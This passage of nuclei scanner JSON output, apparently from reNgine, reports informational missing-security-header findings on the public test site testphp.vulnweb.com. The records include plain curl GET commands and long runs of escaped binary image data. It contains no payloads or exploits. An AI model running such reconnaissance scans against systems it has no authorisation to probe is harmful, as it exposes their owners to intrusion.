\ufffdȺ\\u0001 \\ufffdRJŁ\\u0026\\ufffd\\ufffdv\\ufffd\\ufffd\\ufffd\\u0005\\u0001:\\u000b\\ufffd\\ufffd+\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u003eU\\ufffd\\ufffd\\ufffdߐFA\\u001eA\\\"\\ufffd\\ufffdD\\ufffdV}C\\ufffd\\ufffd\\ufffd\\u0005\\u000c\\ufffd\\ufffd\\ufffdwo'\\ufffd\\ufffd\\u0019'i\\ufffdT\\ufffd\\ufffd|\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u001c\\ufffdCE֯\\ufffd[\\ufffdu\\ufffdʊ\\ufffd\\ufffd\\ufffdH\\ufffdш\\ufffdq\\ufffd\\u0016\\\\\\ufffd\\u001c3\\u000c\\ufffdj\\u001fX\\ufffd;|\\u003c,6p\\ufffd|\\ufffd\\ufffd\\ufffdON\\ufffd\\ufffd\\ufffd]\\ufffd\\ufffd\\ufffdWf\\ufffdڰ.\\ufffdVu \\u0015\\ufffd\\u0006\\u0016@G\\ufffd9\\u003c\\u001e\\ufffd\\ufffd\\ufffd\\u001d\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdGiz\\ufffdŔ:\\ufffd\\ufffdۥ\\ufffd\\ufffd\\ufffdT\\ufffd\\ufffdh\\ufffd\\ufffdz\\ufffd\\ufffd\\u0006=\\ufffdvFs\\ufffdr\\t\\ufffd4\\ufffds^\\ufffd7\\ufffd\\ufffdÝ\\ufffd\\u0011\\ufffdFW\\ufffd\\ufffd\\u003eT\\ufffd\\u000ct\\ufffdV$\\ufffd\\ufffdO\\ufffd[\\ufffd\\ufffd\\ufffd\\ufffd\\u0013\\u0008cc#M\\u0004\\ufffd\\u0019W\\ufffd\\ufffd\\ufffd\\ufffdGܮ\\u001c\\ufffd\\ufffd\\n~r(i\\ufffd\\ufffdjw\\u0006\\u0018Z\\u003c\\ufffd/\\ufffd\\ufffd\\ufffdF\\ufffd\\ufffdx\\u0007\\u0004\\ufffdb21\\ufffd\\ufffdm\\ufffdu\\ufffdXZ\\ufffd*\\ufffdFھ\\ufffd\\ufffd\\u0000ҰEM\\ufffd\\ufffd$*\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdc\\ufffd\\ufffd\\ufffdD}\\ufffd\\ufffdRzE\\u0003\\ufffd\\ufffdH\\ufffd\\ufffd\\ufffda\\ufffd\\ufffd\\u001a\\ufffd{\\ufffd0\\ufffd\\ufffd\\ufffds\\ufffd\\ufffd\\ufffd\\ufffd2\\ufffd(\\ufffd\\ufffdך\\ufffd\\u00063ڢ\\ufffd\\ufffd\\ufffd\\ufffdF\\ufffd(\\ufffd\\ufffd\\\"\\ufffd(\\ufffd\\u0008\\ufffd\\ufffd(Bl\\ufffdmEE\\u0015Ġ\\ufffd\\u0006\\ufffd'=袄\\ufffd\\ufffd\\ufffd\\u000e\\ufffdw\\ufffdj\\ufffdwd\\ufffd:\\ufffdY\\u0018e%O(\\ufffdʜv\\ufffd\\u00020@5\\ufffd:\\ufffd6WWqDIX\\ufffd\\ufffd\\ufffd\\ufffdq\\ufffdE\\u0015\\ufffdn\\ufffd\\u0007\\ufffd\\ufffd\\ufffd\\ufffdx\\ufffdߴ\\ufffd+m6\\ufffd\\ufffde\\nč#;rX\\ufffd\\u001e\\ufffdI$\\ufffd\\ufffdw\\ufffd\\u0000\\u0006\\u0000\\ufffd\\\\0\\u0017\\ufffd7\\ufffd\\ufffdU\\u0003\\r\\u0018\\u000b\\ufffd\\ufffd\\u0011\\ufffd\\ufffd9\\u0018\\ufffd\\u0004w\\ufffd\\u003c`\\ufffd\\ufffdȾ$\\ufffd/\\ufffd\\ufffd\\ufffd\\ufffd*\\ufffdrțö\\u003e\\ufffdW\\ufffd\\ufffd\\u0013\\ufffdO.\\ufffd=\\ufffdП\\ufffd.\\ufffd\\u0004\\u0001\\ufffd\\ufffdc\\ufffdY!\\n\\ufffd\\ufffdWv\\ufffdv\\ufffd\\u0019e\\u0007\\ufffd\\u0015\\ufffd\\ufffdf\\ufffd\\ufffdӧ\\ufffd\\ufffdmn\\ufffd\\ufffd\\ufffd\\ufffdB\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd8ݑ\\ufffd؁\\ufffd\\ufffd\\u003c`\\ufffd\\ufffd(\\ufffd:\\ufffd\\u0000\\ufffd\\u000f\\ufffdL\\ufffdOd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd1\\ufffd\\ufffdigw|\\ufffd\\ufffd)\\ufffd\\ufffd\\u0004\\ufffd\\ufffd\\u00078\\ufffd\\ufffd\\ufffd\\ufffd;\\ufffd98\\ufffd@\\ufffdE\\u0015\\u0017\\ufffd1\\ufffd\\ufffd\\ufffdE\\ufffd\\u001f`\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0002\\ufffd}\\ufffd\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:21.426199034Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36' 'http://testphp.vulnweb.com/pictures/3.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-opener-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/cgi-bin\",\"path\":\"/cgi-bin\",\"matched-at\":\"http://testphp.vulnweb.com/cgi-bin\",\"request\":\"GET /cgi-bin HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 403 Forbidden\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=iso-8859-1\\r\\nDate: Wed, 13 Nov 2024 02:41:39 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//IETF//DTD HTML 2.0//EN\\\"\\u003e\\n\\u003chtml\\u003e\\u003chead\\u003e\\n\\u003ctitle\\u003e403 Forbidden\\u003c/title\\u003e\\n\\u003c/head\\u003e\\u003cbody\\u003e\\n\\u003ch1\\u003eForbidden\\u003c/h1\\u003e\\n\\u003cp\\u003eYou don't have permission to access this resource.\\u003c/p\\u003e\\n\\u003chr\\u003e\\n\\u003caddress\\u003eApache/2.4.46 (Ubuntu) Server at localhost Port 8000\\u003c/address\\u003e\\n\\u003c/body\\u003e\\u003c/html\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:21.42627341Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0' 'http://testphp.vulnweb.com/cgi-bin'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"strict-transport-security\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/7.jpg.tn\",\"path\":\"/pictures/7.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/7.jpg.tn\",\"request\":\"GET /pictures/7.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/606.1.36 (KHTML, like Gecko) Version/9.1.2 Safari/606.1.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 6458\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:42:21 GMT\\r\\nEtag: \\\"4dca64a1-193a\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001c\\u0000\\u0000\\u0001\\u0005\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0006\\u0000\\u0002\\u0004\\u0005\\u0007\\u0003\\u0001\\u0008\\ufffd\\ufffd\\u00006\\u0010\\u0000\\u0002\\u0001\\u0003\\u0003\\u0003\\u0002\\u0004\\u0005\\u0002\\u0007\\u0000\\u0003\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0004\\u0005\\u0011\\u0000\\u0012!\\u0006\\u00131\\\"A\\u00072Qa\\u0014\\u0015#q\\ufffdB\\ufffd3CR\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u001b\\u0001\\u0000\\u0003\\u0000\\u0003\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0004\\u0005\\u0006\\u0001\\u0003\\u0007\\u0000\\u0002\\ufffd\\ufffd\\u00000\\u0011\\u0000\\u0001\\u0003\\u0003\\u0002\\u0004\\u0003\\u0008\\u0003\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0000\\u0002\\u0003\\u0004\\u0005\\u0011!1\\u0012\\u0013AQaq\\ufffd\\u0006\\u0014\\\"2\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0015B\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000\\ufffd\\ufffdI\\ufffdKMc\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd^\\ufffdܡ\\ufffdy!\\ufffd2\\ufffd\\ufffdw\\u0005c\\ufffdϓϑ\\ufffd\\u0019\\ufffd|x\\ufffd\\u001bT]K=$4n\\ufffd2\\ufffd\\u0014ʌb\\ufffd\\ufffd\\u000c\\ufffd\\u0018,1φ\\ufffdG\\ufffdQz~\\ufffd\\ufffd=t\\ufffdW\\ufffd\\u0002\\u001aF*\\ufffdO0uw\\ufffdG\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd|\\ufffd\\ufffdq\\ufffd7\\u003c6nI\\ufffd\\ufffd\\u003c\\ufffd\\ufffd\\u0012)]%?\\ufffd\\ufffd@\\ufffd\\u000ez\\ufffdq\\ufffd\\ufffd\\ufffd\\u0014\\u0003\\ufffds\\ufffdj~\\ufffd\\ufffdE \\ufffd\\ufffd\\ufffd\\ufffdμ\\ufffd\\ufffd\\u0017\\ufffdRׄ\\ufffdH\\ufffd7Y_$\\ufffd5\\ufffd\\ufffdT\\ufffd\\ufffd\\u0018Bʤ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd}\\u001d\\ufffd\\u0026\\ufffd#R\\ufffd\\ufffd\\ufffdO\\ufffdd\\u003e\\ufffd\\ufffd y\\ufffd\\u001c\\ufffd\\ufffd\\u0007VR\\u001c\\ufffd\\u0001u\\ufffdv\\ufffd4*Q\\ufffd\\u0018\\ufffd\\ufffd \\ufffd\\ufffd\\ufffdަ\\u0003\\n\\u0014\\ufffd;\\ufffd\\ufffd\\ufffd\\u000c\\ufffdppt5\\\\\\ufffd\\ufffda\\ufffdl\\u0006\\ufffd\\ufffd:\\ufffdL\\ufffd\\ufffd\\u00059\\u0007$\\ufffd5ǧ\\ufffd3\\ufffd\\ufffd\\ufffd\\ufffdi\\ufffd\\ufffdvb`\\ufffdJ\\ufffdd\\ufffd\\u000f\\ufffd\\ufffdjNﶃ:B\\ufffdu\\ufffd)\\ufffd2\\u001fS;\\ufffd\\u0014\\ufffd\\\"\\ufffdİ\\ufffd\\u0007r\\ufffd\\u0004\\u0000K1\\u0003h\\ufffd\\u0003:.W\\ufffd\\ufffdY\\ufffd\\ufffd\\ufffd;\\ufffdw\\nCI9\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\tϝ3w\\ufffdH\\ufffd\\ufffdD\\ufffdp\\ufffdf\\ufffdy\\ufffd\\u000b\\rp\\ufffd\\ufffd\\ufffd\\u00171\\ufffd~\\u000e7x϶uWCw\\ufffdD\\ufffd\\u000b\\ufffd\\u0012E@\\ufffd\\u000e\\ufffd\\u0018\\u0012FAR}\\ufffd\\ufffd\\ufffd\\u000f\\u0007\\u0004\\u00105:V\\ufffd\\ufffd\\ufffdr\\ufffd\\ufffd\\ufffd\\ufffd0\\ufffdѐ7W\\u000c\\ufffd\\ufffd\\u0017n04\\ufffd o}r\\ufffdN\\u003e\\ufffd\\ufffd+\\rb\\ufffd':\\ufffd6Ll\\u0011\\ufffd\\ufffd8lx\\ufffdBt\\ufffd\\ufffd\\ufffdc+[\\ufffd\\ufffd\\ufffd\\ufffd\\u000fIt\\ufffdj\\ufffdY!\\ufffd\\ufffd!\\ufffd^\\ufffdqʑ\\ufffd,{\\ufffd疉q\\ufffd_\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdd\\u0014\\ufffd\\ufffdG$P\\ufffd\\ufffd\\n\\u000eԳ\\ufffd\\ufffd\\r\\ufffdR\\ufffd\\ufffd\\ufffd\\ufffd\\u003cg\\u001cx\\ufffd]\\ufffdH\\ufffd\\u001dT\\ufffdJ\\ufffdVشQ\\ufffd\\ufffdl\\ufffddd\\ufffd\\u0003$g*\\u0008\\u0004\\ufffd\\u0000\\ufffd:\\ufffdr\\ufffd\\u001bg\\ufffdM$\\ufffd\\u0004h\\ufffd\\ufffd\\ufffd\\ufffdV\\ufffdKm\\u0018\\u0000珮F\\ufffdE\\u001bc\\ufffd\\ufffd\\ufffd\\ufffd\\u0018\\ufffd󟲧\\ufffdϚ\\ufffd\\u001b \\ufffdS\\ufffd\\u0000v\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000b\\ufffd\\u0012\\ufffd\\u0008c}\\ufffdPHq\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdKQ\\u001cK\\ufffdWD\\\\\\ufffd\\ufffd8\\ufffd\\ufffd\\u000f\\ufffdӬ\\ufffd\\ufffdR\\ufffd\\ufffdi\\ufffd#U+:Y\\ufffdJJ\\ufffd\\ufffd\\ufffd2B\\ufffd\\ufffd\\u000cW \\ufffd\\ufffdA\\ufffd\\u0000q\\ufffd\\u0019\\ufffd\\u0000Ρy\\ufffdi\\ufffd\\ufffd;^\\u0013\\ufffd4\\ufffd8\\u001f}}a|\\u0012\\ufffd\\\\Zu\\ufffd\\ufffd\\ufffd\\u0015\\u001eP\\ufffd\\ufffd\\ufffd±\\ufffd\\u0004\\ufffd\\u0006\\ufffd//_\\u000c\\ufffdOC\\ufffd\\ufffd\\u0014KP\\ufffdXa/\\ufffdj\\ufffd!F\\u0007k8;\\ufffd@%x$`\\ufffdRx\\ufffd_U\\n\\ufffd\\ufffdb\\ufffd\\ufffdI\\u0005E\\u001c\\ufffd\\ufffd%1\\ufffd8\\ufffd;\\ufffd\\ufffd\\ufffd\\ufffd`\\ufffd\\ufffd\\ufffd\\ufffd\\u0007:Ww\\ufffd\\ufffdL\\ufffd\\ufffdrF\\ufffdP{;8\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdu'\\ufffd\\ufffd\\ufffd\\\\::\\ufffdb\\u00163G\\ufffdB\\ufffd!;Ӎ\\ufffd\\u001caW\\ufffd\\ufffd\\ufffd\\ufffd\\u003c\\u000fa\\ufffd$\\ufffd`s\\ufffd\\ufffd\\ufffd+䦪Ji\\ufffd\\u0018\\u0012Aߌ+.\\u001d_\\ufffd\\ufffd\\u0005P\\ufffd\\ufffd]X\\u0001\\ufffd\\ufffd\\u00006\\ufffdZ\\ufffd8\\ufffd\\u001eK\\ufffd\\u0018D\\u0019c\\ufffd\\u0018\\u001a\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdk\\ufffd\\ufffd[o4O\\u0015nk[\\ufffd\\ufffd\\ufffd\\ufffd}ƚ\\ufffd}\\ufffd7u\\ufffdĴ3H\\ufffd\\ufffdM\\ufffd7q\\u0026\\ufffd\\ufffd*\\ufffd\\ufffd\\ufffd\\ufffdN\\u0007\\ufffd\\ufffdp\\ufffdա\\ufffdw\\ufffdq\\ufffd\\ufffd\\ufffd~\\ufffd\\u0001\\ufffd~\\ufffd\\ufffd\\ufffd=\\ufffd\\ufffdE\\ufffd锳\\ufffd|\\ufffd\\ufffdLnp\\ufffd\\\\3$\\u000e\\ufffd\\ufffd\\ufffd1\\ufffd\\ufffd\\ufffd\\ufffd\\n\\ufffd\\ufffd;\\ufffdB\\ufffd\\ufffd\\ufffd\\ufffd(b\\ufffdG\\ufffd8c\\ufffd\\u0001vg,Ac\\ufffd\\u0013$\\ufffd\\u0005\\ufffd\\u0000J^\\ufffd^=\\ufffd\\ufffd\\ufffd\\ufffdϝ\\nu+\\ufffdQG:\\u0019B\\u000c\\u001c\\ufffd#\\ufffd\\ufffd΄\\ufffd`q\\u0012\\ufffd\\ufffdM\\ufffd\\u0013[[\\ufffdC\\ufffdx\\ufffd]\\ufffd\\ufffd\\u00158\\ufffd4F:s\\u0013\\\"\\ufffd\\ufffd\\ufffdRRT\\ufffdy \\ufffd\\ufffd\\ufffd|\\ufffd\\ufffd\\ufffdR\\ufffd3\\ufffd\\ufffd\\u0002\\ufffd\\ufffdܮ}\\u0011=ʎ\\u0016\\ufffd\\ufffd\\ufffd(bhi`H\\ufffd\\u0000\\u0011\\u0000\\u0005\\\";\\u0011F\\ufffdI\\ufffd\\n\\ufffd?0b\\ufffd\\ufffd:z\\ufffd=L\\ufffd4ҁ\\ufffd\\u0008\\ufffd\\u0001G\\u0007\\ufffd\\u0000}\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u003c\\ufffd\\ufffd\\u0000\\ufffd\\u001c`t\\ufffd?\\ufffd8\\ufffdX\\u001bN\\ufffd$/\\ufffd[Vt\\ufffd\\u003c\\u001c\\ufffd\\ufffd\\ufffdimS\\ufffd@er\\ufffdC\\u000c\\u0011\\ufffd\\u000cu\\u0005\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdB\\ufffd\\ufffdv\\ufffdC\\ufffd8\\ufffd \\ufffd8\\ufffd \\ufffd\\ufffdD\\ufffd\\ufffduC\\ufffdZ\\ufffdH\\ufffds\\t\\ufffd\\ufffdϾ|\\u0018\\ufffd\\u003eO\\ufffd\\u0008\\u001e\\ufffd\\ufffd\\ufffd \\ufffd\\ufffd\\u0016\\ufffd\\u001d\\u001c\\ufffd!\\ufffd\\u003e(*\\ufffdVl\\ufffdPϲX\\ufffdgqHӘ\\ufffd]\\ufffd\\ufffd\\t\\u000c\\ufffd\\ufffd6L\\u001cn8q.\\u0015A\\u0018!\\ufffd\\ufffd\\ufffd\\u00005\\ufffd\\ufffd\\ufffd\\ufffd'\\ufffd\\ufffd\\ufffd\\u0013\\ufffd\\u0016\\u0013\\u0006\\u0014\\ufffd9`\\ufffd\\u0005\\u0008;9\\u0007$\\ufffd\\u0003\\ufffdhJ\\ufffd\\ufffdӳ\\ufffdI\\ufffdu=]\\u0015X\\u0002\\ufffd\\u000c\\ufffd\\u000b\\ufffd'\\ufffdT\\ufffd_\\u003c\\ufffd\\ufffd\\ufffd\\ufffd\\u0001l\\ufffd\\ufffd̴\\u00157\\u001b|\\ufffd!\\ufffdId\\ufffd\\u0015-\\u0018\\ufffd\\ufffdw+6_\\ufffd\\u000b\\u0000\\ufffd\\ufffd\\ufffd\\ufffd|\\ufffd\\ufffd\\ufffdjJ:\\ufffd\\ufffdr\\ufffd,\\u000c\\ufffd\\ufffd\\ufffdL\\u001d\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd5\\u0015%W\\r\\ufffd\\u0013\\ufffd\\ufffdp5$\\ufffd\\u0016\\ufffdiHऎ\\u0018c\\u0011\\\"q\\ufffd\\u000c\\u0000s\\ufffd\\u0000~\\ufffd\\u001f\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd{\\ufffd(\\n1\\ufffd\\ufffd7\\u001c}\\ufffd\\ufffd\\u0000mH\\ufffdީ\\ufffd\\u000f\\ufffd2f\\ufffdi=\\ufffd\\ufffdL\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffda\\ufffd\\ufffd\\ufffd2F\\ufffd\\u000c$esɩ\\ufffdyt\\ufffd\\u0007\\ufffd\\ufffd\\ufffd\\ufffdw\\u001d7\\ufffd\\ufffd\\u0003g\\ufffd\\ufffd':ނ\\ufffdLs\\ufffdUq\\t#`@ \\ufffd}KsƸK\\ufffd5\\ufffdj\\u0016\\ufffd\\ufffdi\\ufffd@\\ufffd].\\u0004sȒƵ\\u0012\\u000c\\ufffd\\ufffd\\ufffd퐟\\ufffdp\\ufffd\\ufffd\\u0004\\ufffd\\ufffd\\ufffd\\ufffdd\\u0012\\u0015\\ufffd\\ufffd*\\ufffdt\\ufffdU\\ufffdLf\\ufffda\\u0006A\\u0002\\u0017S\\u001b\\ufffd;\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000c0q\\ufffd\\u0005\\u0000\\ufffdu\\ufffd\\ufffd\\ufffd_P6ᐰ#\\ufffd\\n\\ufffd\\ufffd\\u0011\\ufffd\\u0008\\ufffd\\ufffd\\u0013[)\\ufffdp\\ufffd\\ufffd\\ufffd\\ufffdKOz\\ufffd\\ufffdr\\ufffd\\ufffd\\u0006p\\ufffd$\\ufffd\\ufffd\\ufffdr\\ufffd\\ufffd[y\\ufffd\\ufffdM;\\u001ao\\ufffd4\\ufffd\\ufffd\\ufffd!f, /\\ufffdع^\\u0010\\ufffd`\\ufffd\\u0005\\u0001ƢuM/P\\ufffd\\ufffd%\\ufffd\\ufffd\\ufffdL\\ufffd\\ufffd1H\\ufffd\\ufffd\\ufffde\\ufffd5\\ufffd\\ufffd\\u0026с\\ufffd(]\\ufffd\\ufffd!G\\u0003R:\\ufffd\\u0014J\\t\\ufffd\\ufffd4\\ufffd\\ufffde\\ufffdy\\ufffd\\ufffd\\ufffd%\\ufffd\\u000e\\ufffd\\ufffd\\ufffd|g\\u0019\\ufffd\\u0001$\\ufffd~f\\ufffd=Uj\\ufffdu\\u0015\\ufffdJj\\ufffd\\ufffdAQG:\\ufffd-c\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000eq\\ufffd\\ufffd#\\ufffd\\ufffdˑ\\ufffd\\ufffd\\ufffd\\ufffd~r0s\\ufffd\\ufffd˷n\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdl\\ufffds1\\ufffd\\ufffd\\ufffdGIw\\ufffd\\u0012CW\\u0004\\ufffd\\ufffd\\ufffdv\\ufffds\\ufffdG\\u001c\\u00022\\u000e\\u0008\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdsQQ\\u000c\\ufffd\\ufffd\\u001dE-\\u003c2\\\"\\ufffd\\ufffd\\ufffd \\ufffdeV\\ufffd\\ufffdq\\ufffd\\ufffd9\\ufffd\\ufffdr\\u0018\\u0000\\ufffd\\ufffd\\ufffd\\ufffd0\\ufffdXk\\ufffd\\u0006\\ufffd\\ufffd\\ufffd\\ufffd\\u0014J\\ufffdu\\ufffd\\ufffd\\u000e\\ufffd\\ufffd\\n2\\ufffd\\u001d\\ufffd\\ufffd2.\\u0014r@\\u003cx\\ufffdk=MT߄\\u0012,P\\ufffd\\ufffd,-Q\\u001a\\ufffdr\\ufffd\\ufffd=L1\\ufffdp`s\\ufffd\\ufffd\\ufffdx\\ufffd=\\ufffdhk\\ufffd#9#ӧ\\ufffd\\n\\ufffdC\\ufffd'\\ufffdf\\ufffd\\u003e\\ufffdh\\ufffd\\ufffd%\\ufffd\\ufffd\\ufffd^mv\\ufffd\\ufffdK\\ufffd]R\\ufffd5=\\ufffd\\ufffd;\\u003e%œ\\ufffd8\\u001bO,7z\\ufffdg蹵%ud\\ufffd2=\\ufffdR:\\ufffdw\\ufffdD\\u0011\\ufffd\\u0013\\ufffd\\u0017n\\ufffd\\ufffd\\ufffd\\u00047\\u003c\\ufffd\\u000c\\ufffd\\u001b\\ufffdAƑ\\ufffd\\ufffdAq\\ufffd|=\\ufffd\\ufffd\\ufffd-p\\\\j\\u0016\\u0026\\ufffdU\\u0003d\\ufffd\\ufffd\\ufffd\\ufffdX\\ufffd0US\\u0019l`\\u0005*\\ufffd\\ufffdg\\u0015\\ufffd\\ufffd\\ufffdx\\ufffd\\ufffd!\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0014HY\\ufffd\\u0000\\ufffd\\ufffd9\\ufffd\\u000f\\ufffd\\ufffdog\\ufffdk\\ufffd6\\ufffd\\ufffd8;\\ufffd\\ufffd\\u0026\\ufffdVq\\ufffd#ܕ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdz\\ufffd\\ufffdT\\ufffd9q\\u0018\\nN\\ufffdp\\u0007\\ufffdQ\\ufffd\\ufffd-\\u0018\\ufffd\\ufffd\\u001aeK\\ufffdB\\u000f \\ufffd\\ufffd\\ufffd\\ufffd\\u0017d.*Ȱ\\ufffdU=\\ufffd\\ufffdM|\\ufffd\\ufffd\\ufffdi\\ufffdA\\u0026\\ufffd0ʮ\\ufffd\\ufffdA\\r\\ufffdO\\u003ex\\ufffd\\ufffd\\u000f \\ufffdr\\ufffd^\\ufffd\\ufffd\\ufffd\\ufffdb\\ufffd\\ufffdi]c\\ufffd!M嘜\\u0001\\ufffd;\\ufffd \\u0000\\u0001\\ufffd\\u003c\\ufffd3_QJ\\ufffdj\\ufffd\\u0008\\u0012/y\\ufffdĀ(p\\ufffd,\\ufffdW\\u000cW!q\\ufffd\\u0004z\\ufffd\\ufffdȠ\\ufffd\\ufffde\\ufffd\\u0011\\ufffd_Qr\\ufffd\\ufffdĂ\\u001bz%E\\u003c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdGc\\ufffdS\\u0012\\ufffd|\\ufffd\\ufffd\\ufffd\\ufffd3\\ufffd\\ufffd)\\ufffd\\\"\\ufffd{\\twq\\ufffd\\ufffd\\ufffd㺴\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd̍ÇM5\\ufffd׺\\ufffd@\\ufffd\\ufffd\\ufffd\\ufffdV\\ufffdm\\ufffd\\ufffd\\u0019dd\\ufffd\\ufffdd\\ufffd\\ufffd!]\\ufffd\\ufffd)\\ufffd\\ufffd%G\\u0000d\\ufffd\\u0017h݃\\ufffd\\ufffdwr\\ufffd\\ufffd\\ufffd{b\\ufffdjƪ\\tQOH#\\u0005\\ufffdy\\ufffd1